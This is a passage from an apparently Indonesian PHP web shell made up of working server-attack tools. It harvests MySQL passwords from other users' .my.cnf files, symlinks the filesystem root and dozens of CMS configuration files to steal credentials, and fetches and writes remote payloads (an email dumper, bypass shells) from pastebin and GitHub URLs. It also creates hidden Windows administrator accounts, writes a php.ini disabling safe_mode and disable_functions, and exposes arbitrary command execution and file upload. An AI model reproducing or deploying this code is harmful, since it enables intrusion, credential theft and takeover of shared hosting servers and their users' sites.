1249. $password=entre2v2($p,'password="','"');
1250. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1251. $dc++;
1252. }
1253.  
1254. }
1255. }
1256. echo '</table>';
1257. $total = $dc;
1258. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1259. echo '</center>';
1260. }else{
1261. $d0mains = @file('/etc/named.conf');
1262. if($d0mains) {
1263. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1264. $count=1;
1265. $dc = 0;
1266. $mck = array();
1267. foreach($d0mains as $d0main){
1268. if(@eregi('zone',$d0main)){
1269. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1270. flush();
1271. if(strlen(trim($domain[1][0])) >2){
1272. $mck[] = $domain[1][0];
1273. }
1274. }
1275. }
1276. $mck = array_unique($mck);
1277. $usr = array();
1278. $dmn = array();
1279. foreach($mck as $o) {
1280. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1281. $usr[] = $infos['name'];
1282. $dmn[] = $o;
1283. }
1284. array_multisort($usr,$dmn);
1285. $dt = file('/etc/passwd');
1286. $passwd = array();
1287. foreach($dt as $d) {
1288. $r = explode(':',$d);
1289. if(strpos($r[5],'home')) {
1290. $passwd[$r[0]] = $r[5];
1291. }
1292. }
1293. $l=0;
1294. $j=1;
1295. foreach($usr as $r) {
1296. $dirz = '/home/'.$r.'/.my.cnf';
1297. $path = getcwd();
1298. if (is_readable($dirz)) {
1299. copy($dirz, ''.$path.'/'.$r.'.txt');
1300. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1301. $password=entre2v2($p,'password="','"');
1302. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1303. $dc++;
1304. flush();
1305. $l=$l?0:1;
1306. $j++;
1307. }
1308. }
1309. }
1310. echo '</table>';
1311. $total = $dc;
1312. echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1313. echo '</center>';
1314.  
1315. }
1316. }else{
1317. echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1318. }
1319.  
1320. echo "</body></html>";
1321. break;
1322. }
1323.  
1324. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1325. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
1326. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1327.  
1328.  
1329. elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
1330. {
1331. ?>
1332. <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
1333. <center><h2>Domain Viewer</h2></center><br><br>
1334. <?php
1335. function openBaseDir()
1336. {
1337. $openBaseDir = ini_get("open_basedir");
1338. if (!$openBaseDir)
1339. {
1340. $openBaseDir = '<font color="green">OFF</font>';
1341. }
1342. else
1343. {
1344. $openBaseDir = '<font color="red">ON</font>';
1345. }
1346. return $openBaseDir;
1347. }
1348.  
1349.  
1350. echo '
1351. <table width="95%" cellspacing="0" cellpadding="0" >
1352. <td height="100" align="left" >';
1353. $pg = basename(__FILE__);
1354. $safe_mode = @ini_get('safe_mode');
1355. $dir = @getcwd();
1356. ////////////////////////////////////////////////////
1357. #.htaccess
1358. @mkdir('pee',0777);
1359. @symlink("/","pee/root");
1360. $htaccss = "Options all
1361. DirectoryIndex Sux.html
1362. AddType text/plain .php
1363. AddHandler server-parsed .php
1364. AddType text/plain .html
1365. AddHandler txt .html
1366. Require None
1367. Satisfy Any";
1368.  
1369. file_put_contents("pee/.htaccess",$htaccss);
1370. $etc = file_get_contents("/etc/passwd");
1371. $etcz = explode("\n",$etc);
1372.  
1373.  
1374. ##Symlink to the ROOT :p
1375. foreach($etcz as $etz){
1376. $etcc = explode(":",$etz);
1377. error_reporting(0);
1378.  
1379. $current_dir = posix_getcwd();
1380. $dir = explode("/",$current_dir);
1381.  
1382. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1383. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1384. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1385. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1386. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1387. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1388. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1389. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1390. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1391. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1392. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
1393. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
1394. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
1395. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
1396. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
1397. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
1398. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
1399. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1400. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1401. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1402. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1403. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1404. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1405. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1406. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1407. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1408. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1409. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1410. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1411. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1412. }
1413. #############################
1414. if(is_readable("/var/named")){
1415. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1416. echo'<tr><td><center><b>SITE</b></center></td><td>
1417. <center><b>USER</b></center></td>
1418. <td></center><b>SYMLINK</b></center></td>';
1419. $list = scandir("/var/named");
1420. foreach($list as $domain){
1421. if(strpos($domain,".db")){
1422. $i += 1;
1423. $domain = str_replace('.db','',$domain);
1424. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1425.  
1426. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1427. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1428. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1429. }
1430. }
1431. echo "<center>Total Domains Found: ".$i."</center><br />";
1432. }else{
1433. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1434.  
1435. break;
1436.  
1437. ##################################
1438. error_reporting(0);
1439. $etc = file_get_contents("/etc/passwd");
1440. $etcz = explode("\n",$etc);
1441. if(is_readable("/etc/passwd")){
1442.  
1443. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1444. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1445.  
1446. $list = scandir("/var/named");
1447.  
1448. foreach($etcz as $etz){
1449. $etcc = explode(":",$etz);
1450.  
1451. foreach($list as $domain){
1452. if(strpos($domain,".db")){
1453. $domain = str_replace('.db','',$domain);
1454. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1455. if($owner['name'] == $etcc[0])
1456. {
1457. $i += 1;
1458. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1459. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1460. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1461. }}}}
1462. echo "<center>Total Domains Found: ".$i."</center><br />";}
1463.  
1464. break;
1465. ###############################
1466. if(is_readable("/etc/named.conf")){
1467. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1468. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1469. $named = file_get_contents("/etc/named.conf");
1470. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1471. foreach($domains[1] as $domain){
1472. $domain = trim($domain);
1473. $i += 1;
1474. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1475. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1476. }
1477. echo "<center>Total Domains Found: ".$i."</center><br />";
1478.  
1479. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1480.  
1481. break;
1482. ############################
1483. if(is_readable("/etc/valiases")){
1484. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1485. echo'<tr><td><center><b>SITE</b></center></td><td>
1486. <center><b>USER</b></center></td><td></center>
1487. <b>SYMLINK</b></center></td>';
1488. $list = scandir("/etc/valiases");
1489. foreach($list as $domain){
1490. $i += 1;
1491. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1492. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1493. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1494. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1495. }
1496. echo "<center>Total Domains Found: ".$i."</center><br />";
1497. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1498.  
1499. break;
1500. }
1501.  
1502. ///DUMP
1503. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
1504. {
1505. ?>
1506. <br/><br/>
1507. <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
1508. <?php
1509. $pilih = $_POST['pilihan'];
1510. echo'<center>
1511. <table border=1>
1512. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1513. <option value="dumper">Gate 1</option>
1514. </select>
1515. <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
1516. if ( $pilih == "dumper") {
1517. $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
1518. file_put_contents("dumper.php",$files);
1519. echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
1520. echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
1521. die();
1522. }
1523. echo'</td></form></tr></table>';
1524. break;
1525. }
1526.  
1527. ///menu rdp
1528. if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
1529. /* By Shor7cut */
1530. /* Interface By Putra-Attacker*/
1531. {
1532. if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
1533. {
1534. ?><br/><br/>
1535. <div id="content-left">
1536. <form action="" method="post">
1537. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1538. <tr>
1539. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
1540. </tr>
1541. <tr>
1542. <td><font class='kecew'>Username</font></td>
1543. <td><font class='kecew'> : </font></td>
1544. <td><input type="text" class="bordergaya" name="username" required></td>
1545. </tr>
1546. <tr>
1547. <td><font class='kecew'>Password</font></td>
1548. <td><font class='kecew'> : </font></td>
1549. <td><input type="text" class="bordergaya" name="password" required></td>
1550. </tr>
1551. <tr>
1552. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
1553. </tr>
1554. </table>
1555. </form>
1556. </div>
1557. <br/>
1558. <div id="content-left">
1559. <form action="" method="post">
1560. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1561. <tr>
1562. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
1563. </tr>
1564. <tr>
1565. <td><font class='kecew'>Username</font></td>
1566. <td><font class='kecew'> : </font></td>
1567. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
1568. </tr>
1569. <tr>
1570. <td><font class='kecew'>Password</font></td>
1571. <td><font class='kecew'> : </font></td>
1572. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
1573. </tr>
1574. <tr>
1575. <td><font class='kecew'>Action</font></td>
1576. <td><font class='kecew'> : </font></td>
1577. <td>
1578. <select name="aksi" class="bordergaya">
1579. <option value="1">Tampilkan Username</option>
1580. <option value="2">Hapus Username</option>
1581. <option value="3">Ubah Password</option>
1582. </select>
1583. </td>
1584. </tr>
1585. <tr>
1586. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
1587. </tr>
1588. </table>
1589. </form>
1590. <br/>
1591. </div>
1592. </center></center>
1593. <?php
1594. if($_POST['submit'])
1595. {
1596. if($_POST['kshell']=="1")
1597. {
1598. $r_user = $_POST['username'];
1599. $r_pass = $_POST['password'];
1600. $cmd_cek_user = shell_exec("net user");
1601. if(preg_match("/$r_user/", $cmd_cek_user)){
1602. echo $gaya_root.$r_user." sudah ada".$o;
1603. }else {
1604. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
1605. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
1606. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
1607. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
1608. if($cmd_add_user){
1609. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
1610. }else {
1611. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
1612. }
1613. echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
1614. if($cmd_add_groups1){
1615. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1616. }else
1617. if($cmd_add_groups2){
1618. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1619. }else
1620. if($cmd_add_groups3){
1621. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1622. }else {
1623. echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
1624. }
1625. echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
1626. echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
1627. echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
1628. }
1629.  
1630.  
1631. }
1632. else if($_POST['kshell']=="2")
1633. {
1634. echo "<style>
1635. .coeg{margin-left:30%;}
1636. </style>";
1637. if($_POST['aksi']=="1"){
1638. echo "<pre class='coeg'>".shell_exec("net user");
1639. }
1640. else if($_POST['aksi']=="2")
1641. {
1642. $username = $_POST['rusername'];
1643. $cmd_cek_user = shell_exec("net user");
1644. if (!empty($username)){
1645. if(preg_match("/$username/", $cmd_cek_user)){
1646. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
1647. if($cmd_add_user){
1648. echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
1649. echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1650. }else {
1651. echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
1652. }
1653. }else {
1654. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1655. }
1656. }else {
1657. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1658. }
1659. }
1660. else if($_POST['aksi']=="3")
1661. {
1662. echo "<style>
1663. .tengahaja{margin-left:35%}
1664. </style>";
1665. $username = $_POST['rusername'];
1666. $password = $_POST['gantipw'];
1667. $cmd_cek_user = shell_exec("net user");
1668. if (!empty($username)){
1669. if(preg_match("/$username/", $cmd_cek_user)){
1670. $cmd_add_user = shell_exec("net user ".$username."");
1671. if($cmd_add_user){
1672. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1673. }else {
1674. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
1675. }
1676. }else
1677. {
1678. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1679. }
1680. }else
1681. {
1682. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1683. }
1684. }
1685. }
1686.  
1687. }
1688. } else{
1689. echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
1690. }break;
1691. }
1692.  
1693. /*
1694. AUTO UPLOAD
1695. START HERE
1696. */
1697.  
1698. elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
1699. {
1700. echo'<center><br><br><h3>File Creator [Auto upload]</h3>
1701. <table>
1702. <tr><form method="post" action="">&nbsp;<td>
1703. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1704. <option value="hsphere">Bypass hSphere Shell</option>
1705. <option value="adminer">Adminer</option>
1706. </select>
1707. <input type="submit" name="submites" class="bordergaya" value="create">
1708. </td></form></tr></table>';
1709. error_reporting(0);
1710. set_time_limit(0);
1711. $submit = $_POST ['submites'];
1712. if(isset($submit)) {
1713. $pilih = $_POST['pilihan'];
1714. ///hsphere shell
1715. if ( $pilih == 'hsphere') {
1716. $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
1717. file_put_contents("hsphere.php",$files);
1718. echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
1719. echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
1720. die();
1721. }
1722.  
1723. elseif ( $pilih == 'adminer') {
1724. getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
1725. echo "<script>alert('adminer created!'); hideAll();</script>";
1726. echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
1727. die();
1728. }
1729.  
1730. }break;
1731. }
1732.  
1733.  
1734. elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
1735. {
1736. echo '<center><br /><br />
1737. <form enctype="multipart/form-data" method="POST">
1738. <input type="file" name="file" id="file" class="inputfile inputfile-4" />
1739. <label for="file">
1740. <figure>
1741. <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
1742. </figure>
1743. <span>Silahkan Pilih File</span>
1744. </label>';
1745. ?>
1746. <script type="text/javascript">
1747. /*
1748. By Osvaldas Valutis, www.osvaldas.info
1749. Available for use under the MIT License
1750. */
1751.  
1752. 'use strict';
1753.  
1754. ;( function ( document, window, index )
1755. {
1756. var inputs = document.querySelectorAll( '.inputfile' );
1757. Array.prototype.forEach.call( inputs, function( input )
1758. {
1759. var label = input.nextElementSibling,
1760. labelVal = label.innerHTML;
1761.  
1762. input.addEventListener( 'change', function( e )
1763. {
1764. var fileName = '';
1765. if( this.files && this.files.length > 1 )
1766. fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
1767. else
1768. fileName = e.target.value.split( '\\' ).pop();
1769.  
1770. if( fileName )
1771. label.querySelector( 'span' ).innerHTML = fileName;
1772. else
1773. label.innerHTML = labelVal;
1774. });
1775.  
1776. // Firefox bug fix
1777. input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
1778. input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
1779. });
1780. }( document, window, 0 ));
1781. </script>
1782. <?php
1783. echo'<br/>
1784. <input type="submit" class="tombolupil" value="Upload File!" />
1785. </form>';
1786. if(isset($_FILES['file'])){
1787. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1788. echo '<script>alert("File Sukses Di Upload!");</script>';
1789. }else{
1790. echo '<script>alert("File Gagal Di Upload!");</script>';
1791. }
1792. }
1793. echo "</center><br /><br />";
1794. break;
1795. }
1796.  
1797. ///////////////////////////
1798.  
1799. ////////////////////////CMD////////////////////////
1800.  
1801. elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
1802. echo "<br/><br/><form method='post'>
1803. <font clss='rapihbanget'>Command :</font>
1804. <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
1805. </form>";
1806. if($_POST['execmd']) {
1807. echo "<pre>".exe($_POST['cmd'])."</pre>";
1808. }
1809. }
1810.  
1811. ///////////////////////////////////////////////////
1812.  
1813. //////////////////////////////////////////////////
1814. //////////////////////////////////////////////////
1815. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
1816. {
1817. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
1818. <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
1819. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
1820. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
1821. <br/><br/><br/><br/>
1822. <?php
1823. }
1824. //////////////////////////////////////////////////
1825. //////////////////////////////////////////////////
1826.  
1827. ////////////////////////////////////////
1828. ///////////////////////////////////////
1829. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
1830. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
1831. mkdir('bysyswsf', 0755);
1832. chdir('bysyswsf');
1833. $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
1834. $file = fopen("bysyswsf.php" ,"w+");
1835. $write = fwrite ($file ,$bysyswsf);
1836. fclose($file);
1837. chmod("bysyswsf.php",0755);
1838. echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
1839. }
1840. ////////////////////////////////////////
1841. ////////////////////////////////////////
1842. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
1843. $byht = "safe_mode = Off
1844. disable_functions = None
1845. safe_mode_gid = OFF
1846. open_basedir = OFF
1847. allow_url_fopen = On";
1848. file_put_contents("php.ini",$byht);
1849. echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
1850. die('<meta http-equiv="refresh" content="0; url=?" />');
1851. }
1852. ////////////////////////////////////////
1853. ///////////////////////////////////////
1854. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
1855. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
1856. mkdir('bysyswexecf', 0755);
1857. chdir('bysyswexecf');
1858. $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
1859. $file = fopen("bysyswexecf.php" ,"w+");
1860. $write = fwrite ($file ,$bysyswsf);
1861. fclose($file);
1862. chmod("bysyswexecf.php",0755);
1863. echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
1864. }
1865. ////////////////////////////////////////
1866. ////////////////////////////////////////
1867.  
1868. ///////////////////////////////////////////////////////////////////////////
1869. ///////////JUMPING////////////////////////////////////////////////////////
1870. //////////////////////////////////////////
1871. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){
1872. ?>
1873. <form action="?path=<?php echo $pwd; ?>&amp;x=jumping" method="post">
1874. <?php
1875. //radable public_html
1876. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
1877. set_time_limit(0);
1878. ###################
1879. @$passwd = fopen('/etc/passwd','r');
1880. if (!$passwd) { die('<br>[-] Error : coudn`t read /etc/passwd'); }
1881. $pub = array();
1882. $users = array();
1883. $conf = array();
1884. $i = 0;
1885. while(!feof($passwd))
1886. {
1887. $str = fgets($passwd);
1888. if ($i > 35)
1889. {
1890. $pos = strpos($str,':');
1891. $username = substr($str,0,$pos);
1892. $dirz = '/home/'.$username.'/public_html/';
1893. if (($username != ''))
1894. {
1895. if (is_readable($dirz))
1896. {
1897. array_push($users,$username);
1898. array_push($pub,$dirz);
1899. }
1900. }
1901. }
1902. $i++;
1903. }
1904. ###################
1905. echo '<br><br></center></center>';
1906. echo "<font class='rapihbanget'>[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font>";
1907. echo "<font class='rapihbanget'>[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font>";
1908. echo "<font class='rapihbanget'>[~] Searching for passwords in config files...<br /><br /></font>";
1909. foreach ($users as $user)
1910. {
1911. $path = "/home/$user/public_html/";
1912. echo "<font class='rapihbanget'><a href='?path&#61;$path' target='_blank' font-weight:bold; color:#F80;'>$path</a><br></font>";
1913. }
1914. echo "<br /><font class='rapihbanget'>[+] Complete...\n"."<br /></font>";
1915. echo "<font class='rapihbanget'>[+] Monggo Sikat Boz!\n"."<br /></font>";
1916. echo '<br><br></b></body><center>';
1917. }
1918. ///////////////
